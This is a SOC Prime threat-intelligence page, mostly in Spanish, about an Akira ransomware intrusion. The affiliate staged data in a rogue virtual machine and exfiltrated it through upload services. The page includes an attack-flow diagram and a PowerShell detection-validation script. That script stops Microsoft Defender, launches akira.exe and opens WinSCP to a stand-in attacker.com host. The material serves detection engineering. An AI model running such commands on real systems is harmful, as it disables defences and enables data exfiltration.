SOC Prime Bias: Alto

19 Jun 2026 07:31 UTC
newspaper icon Huntress

Akira, LimeWire y el Amargo Sabor de la Exfiltración de Datos

Author Photo
SOC Prime Team linkedin icon Seguir
Akira, LimeWire y el Amargo Sabor de la Exfiltración de Datos
shield icon

Detection stack

  • AIDR
  • Alert
  • ETL
  • Query


Resumen

Un afiliado del ransomware Akira obtuvo acceso no autorizado a un hipervisor y creó una nueva máquina virtual para usar como un entorno de preparación encubierto. El atacante se basó en esta VM aislada para evitar el monitoreo de seguridad, preparar datos con WinRAR y exfiltrar archivos a través de la plataforma de intercambio de archivos Easyupload.io. El caso demuestra cómo los actores de amenazas continúan abusando de los servicios legítimos de subida para el robo de datos.

Investigación

La investigación combinó la telemetría de EDR, registros de eventos de Windows y el historial de navegación de Microsoft Edge para reconstruir la intrusión. Los analistas también recuperaron una imagen VHDX de la máquina virtual fraudulenta, la cual reveló que el atacante desactivó Microsoft Defender y configuró la operación de ransomware Akira. La revisión forense de la VM expuso las herramientas exactas, sitios web y flujo de trabajo utilizados durante las fases de preparación y exfiltración.

Mitigación

Las organizaciones deben monitorear la aparición de nuevos puntos finales o instancias de máquinas virtuales no autorizadas en su entorno. Es esencial tener una buena visibilidad sobre el acceso remoto a sistemas críticos como hipervisores y controladores de dominio. También es importante restringir o monitorear de cerca el acceso a servicios conocidos de intercambio de archivos y carga rápida que pueden ser utilizados para la exfiltración.

Respuesta

Si se identifica un acceso no autorizado al hipervisor, aísle inmediatamente el hipervisor afectado y cualquier máquina virtual recién creada. Realice un análisis forense de las imágenes de disco de la VM para determinar el alcance de la preparación y exfiltración de datos. Revise los registros de acceso para rastrear el punto de entrada original y confirmar que no queda acceso persistente del atacante.

graph TB %% Definición de clases classDef action fill:#99ccff classDef tool fill:#cccccc classDef malware fill:#ff6666 classDef defense fill:#ffcc00 %% Fase de acceso inicial action_access[«<b>Acción</b> – <b>T1563.002 y T1021</b><br/>Acceso no autorizado mediante Servicios Remotos<br/>y Secuestro de Sesiones dirigido contra<br/>el Controlador de Dominio y el Hipervisor.»] class action_access action %% Fase de reconocimiento action_recon_ad[«<b>Acción</b> – <b>T1087 y T1681</b><br/>Reconocimiento mediante enumeración de<br/>usuarios y equipos de Active Directory.»] class action_recon_ad action action_recon_soft[«<b>Acción</b> – <b>T1592.002</b><br/>Descubrimiento de información relacionada<br/>con el software del host.»] class action_recon_soft action %% Evasión de defensas y preparación action_hide_artifact[«<b>Acción</b> – <b>T1564.006</b><br/>Ocultación de artefactos mediante la ejecución<br/>de una nueva instancia virtual en el hipervisor<br/>para evadir agentes de seguridad.»] class action_hide_artifact action action_disable_defender[«<b>Acción</b> – <b>T1685</b><br/>Deterioro de defensas mediante la desactivación<br/>de Microsoft Defender en la nueva máquina virtual.»] class action_disable_defender defense %% Movimiento lateral y recopilación de datos action_lateral_move[«<b>Acción</b> – <b>T1080</b><br/>Movimiento lateral hacia el<br/>servidor de archivos de la organización.»] class action_lateral_move action tool_winrar[«<b>Herramienta</b> – <b>Nombre</b>: WinRAR<br/><b>Descripción</b>: Utilizada para archivar<br/>archivos sensibles dentro de carpetas compartidas.»] class tool_winrar tool action_collect_data[«<b>Acción</b> – <b>T1560</b><br/>Recopilación de datos mediante el archivado<br/>de archivos sensibles.»] class action_collect_data action %% Fase de exfiltración action_stage_data[«<b>Acción</b> – <b>T1074.002</b><br/>Preparación de datos mediante el almacenamiento<br/>temporal de archivos comprimidos antes de la exfiltración.»] class action_stage_data action action_move_tools[«<b>Acción</b> – <b>T1570</b><br/>Transferencia de herramientas entrantes para mover<br/>herramientas de ataque dentro del entorno.»] class action_move_tools action tool_winscp[«<b>Herramienta</b> – <b>Nombre</b>: WinSCP<br/><b>Descripción</b>: Utilizada para<br/>transferencia de datos.»] class tool_winscp tool tool_easyupload[«<b>Herramienta</b> – <b>Nombre</b>: Easyupload.io / LimeWire<br/><b>Descripción</b>: Servicio web de transferencia de archivos<br/>utilizado para la exfiltración.»] class tool_easyupload tool action_exfiltrate[«<b>Acción</b> – <b>T1071.002 y T1105</b><br/>Exfiltración mediante servicios basados en web<br/>y protocolos de transferencia de archivos.»] class action_exfiltrate action %% Fase de impacto malware_akira[«<b>Malware</b> – <b>Nombre</b>: Akira ransomware<br/><b>Archivo</b>: akira.exe<br/><b>Descripción</b>: Cifra archivos en<br/>recursos compartidos de red montados.»] class malware_akira malware action_impact[«<b>Acción</b> – <b>T1486</b><br/>Impacto mediante cifrado de datos.»] class action_impact action %% Flujo de conexiones action_access –>|conduce_a| action_recon_ad action_access –>|conduce_a| action_recon_soft action_recon_ad –>|conduce_a| action_hide_artifact action_recon_soft –>|conduce_a| action_hide_artifact action_hide_artifact –>|conduce_a| action_disable_defender action_disable_defender –>|conduce_a| action_lateral_move action_lateral_move –>|conduce_a| action_collect_data action_collect_data –>|utiliza| tool_winrar action_collect_data –>|conduce_a| action_stage_data action_stage_data –>|conduce_a| action_move_tools action_move_tools –>|conduce_a| action_exfiltrate action_exfiltrate –>|utiliza| tool_winscp action_exfiltrate –>|utiliza| tool_easyupload action_exfiltrate –>|conduce_a| malware_akira malware_akira –>|resulta_en| action_impact

Flujo de Ataque

Simulation Execution

Prerequisite: The Telemetry & Baseline Pre-flight Check must have passed.

Rationale: This section details the precise execution of the adversary technique (TTP) designed to trigger the detection rule. The commands and narrative MUST directly reflect the TTPs identified and aim to generate the exact telemetry expected by the detection logic. Abstract or unrelated examples will lead to misdiagnosis.

  • Attack Narrative & Commands: The adversary has gained initial access and is looking to escalate the impact. They first enumerate sensitive files by checking for known text files like AdUsers.txt. To prepare for exfiltration, they use WinRAR.exe to compress the data. They then prepare their exfiltration tool, WinSCP.exe, and finally execute the akira.exe ransomware payload. To prevent the EDR/Antivirus from killing the process, they attempt to stop the Windefend service. This specific sequence of command-line arguments and service status changes is intended to trigger the Akira-specific detection logic.

  • Regression Test Script:

    # Simulation Script for Akira Ransomware Detection Validation
# NOTE: This script requires administrative privileges to stop the Defender service.

Write-Host "[+] Starting Akira Ransomware Simulation..." -ForegroundColor Cyan

# 1. Simulate Discovery/Enumeration (T1119)
Write-Host "[+] Step 1: Simulating file enumeration via Notepad..."
Start-Process notepad.exe -ArgumentList "AdUsers.txt"
Start-Sleep -Seconds 2

# 2. Simulate Data Archiving (T1560.003)
# Note: We assume WinRAR is present or we simulate the command line activity
Write-Host "[+] Step 2: Simulating data archival with WinRAR..."
Start-Process "WinRAR.exe" -ArgumentList "a -r sensitive_data.rar AdUsers.txt AdComp.txt"
Start-Sleep -Seconds 2

# 3. Simulate Exfiltration Tool Prep (T1105)
Write-Host "[+] Step 3: Simulating exfiltration tool execution..."
Start-Process "WinSCP.exe" -ArgumentList "/command open sftp://attacker.com"
Start-Sleep -Seconds 2

# 4. Simulate Ransomware Execution (T1204.002)
Write-Host "[+] Step 4: Simulating Akira payload execution..."
Start-Process "akira.exe"
Start-Sleep -Seconds 2

# 5. Simulate Disabling Defender (T1564.006)
# This triggers EventID 7036 in the System Log
Write-Host "[+] Step 5: Attempting to stop Microsoft Defender..."
Stop-Service -Name "Windefend" -Force

Write-Host "[+] Simulation Complete. Check SIEM for alerts." -ForegroundColor Green

  • Cleanup Commands:

    # Cleanup Script
Write-Host "[+] Cleaning up simulation artifacts..." -ForegroundColor Cyan

# Restart Defender Service
Start-Service -Name "Windefend"

# Remove simulated files
Remove-Item -Path "AdUsers.txt", "AdComp.txt", "sensitive_data.rar" -ErrorAction SilentlyContinue

Write-Host "[+] Cleanup complete." -ForegroundColor Green

Únete a la plataforma Detection as Code de SOC Prime para mejorar la visibilidad de las amenazas más relevantes para tu negocio. Para ayudarte a comenzar y obtener valor inmediato, programa una reunión ahora con los expertos de SOC Prime.

Únete gratis